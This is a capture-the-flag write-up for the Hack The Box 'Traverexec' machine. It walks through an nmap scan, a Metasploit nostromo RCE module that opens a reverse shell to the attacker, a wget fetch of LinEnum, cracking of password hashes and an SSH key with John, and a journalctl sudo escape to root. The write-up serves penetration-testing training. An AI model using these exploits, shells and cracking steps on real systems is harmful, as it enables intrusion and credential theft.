Traverexec is a easy difficulty linux machine that's a good introduction to web to host exploitation as well as SSH usage
Recon
we start off by scanning Traverexec's IP 10.10.10.165 with nmap
nmap -T4 -A -v 10.10.10.165
From our results we get the following ports and services
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Right off we see that it's only running 2 services and we have potentially have the server service name nostromo
We can use searchsploit to check if there are any existing exploits for nostromo V1.9.6 using searchsploit nostromo
Perfect we find that there's a RCE exploit for this version of nostromo.
Now lets fire up Metsploit Framework with msfconsole and search for the exploit search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
Perfect! msf has the exploit we want to use now lets select and configure it
Exploit
use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run
after a few seconds we should get the following
[*] Started reverse TCP handler on 10.10.15.64:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700
Great! we have shell, unfortunately it's a limited shell but we can fix that up by upgrading it to a full PTY shell with python -c 'import pty:pty.spawn("/bin/bash")'
Once we have it, it's time to get it on the victim to do this we'll fire up python -m simpleHTTPServer and on the victim we'll do wget IP Port/LinEnum.sh once we have it we need to set it's permissions with chmod +x LinEnum.sh and then run it ./LinEnum.sh
Upon completetion we find one line that stands out
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
We got a password hash!, coming back to our local machine, we'll put that hash into a file and run it through John
touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me (david)
Upon completion we get the password Nowonly4me
Wee also see that within /home/david/public_wwwcontains a folder protected-file-areawhich is protected by.htaccess checking nostromo documentation http://www.nazgul.ch/dev/nostromo_man.html we see that there is yet another director we can access ~david trying to access this directory gives us the following page
Doesn't look very interesting does it? well typing in the url 10.10.10.165/~david/protected-file-area gives us a auth screen and we already have the credentials for it david:Nowonly4me it takes us to a index page where we can download backup-ssh-identity-files.tgz
Once downloaded we can extract the ssh keys it gives us the following files
Unfortunately the id_rsa is encrypted but luckily we can pass it through john
python/usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter (/root/HTB/Traverexec/home/david/.ssh/id_rsa)
Great! we got the password hunter we can now use this with id_rsa to connect via ssh
ssh -i id_rsa david@10.10.10.165
And With that we have User!
Post Exploitation
Checking David's home dir we find
david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david 802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .
server-stats.head Gives us a banner not much useful, however checking server-stats.sh We get the following
The last line /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat shows us that journalctl is running as root, so can we exploit this?
Yes we can! Checking GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ we find that simply typing !/bin/sh from within journalctl can give us root access! /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh
root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
